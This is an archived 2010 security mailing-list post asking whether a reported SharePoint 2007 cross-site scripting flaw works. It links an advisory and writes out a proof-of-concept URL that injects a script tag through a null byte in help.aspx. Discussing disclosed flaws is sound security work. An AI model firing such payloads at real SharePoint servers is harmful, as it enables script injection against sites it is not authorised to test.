Dailydave mailing list archives

Sharepoint FTW! :>

From: dave <dave () immunityinc com>
Date: Thu, 29 Apr 2010 15:48:43 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Has anyone checked out this Sharepoint 2007 XSS? Does it work? Sharepoint is one of
the single largest data security risks in most large Enterprises and everyone pretty
much ignores it, which is always funny. :>

http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html

This is the string that's supposed to work. Someone try it and let us all know! :>

http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

- -dave
(Note: I'm recovering from an illness - your emails will be answered in the order
they were received!)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkvZ4psACgkQtehAhL0ghep4lQCcDY4wc2y9Icx/1oyd+oFgNMun
VPwAnAnc4dDlUFXVyS3NtsKHdkyG/Q73
=eAv+
-----END PGP SIGNATURE-----
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave

Current thread:

Sharepoint FTW! :> dave (Apr 29)
- Re: Sharepoint FTW! :> pUm (Apr 30)
- Re: Sharepoint FTW! :> Steve Shockley (Apr 30)
- Re: Sharepoint FTW! :> NeZa (Apr 30)